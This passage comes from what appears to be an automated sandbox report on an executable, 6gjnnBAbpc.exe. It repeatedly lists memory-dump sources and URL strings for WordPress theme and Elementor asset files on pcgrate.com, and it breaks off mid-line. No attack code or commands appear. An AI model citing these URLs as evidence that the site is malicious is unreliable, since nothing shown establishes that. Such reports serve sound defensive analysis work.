00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/FontAwesome/css/all.min.css?ver=9.12.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/fonts/icomoon-the7-font/icomoon-the7-font.min.css?v
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/above-the-fold.min.js?ver=9.12.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/compatibility/woocommerce/woocommerce.min.js?ver
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/js/main.min.js?ver=9.12.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.css?ver=9
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/custom-scrollbar/custom-scrollbar.min.js?ver=9.
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/lib/jquery-mousewheel/jquery-mousewheel.min.js?ver=
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/themes/dt-the7/style.css?ver=9.12.0
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/global.css?ver=1664959878
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1009.css?ver=1677257013
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-1185.css?ver=1678274495
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/uploads/elementor/css/post-17.css?ver=1664959878
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 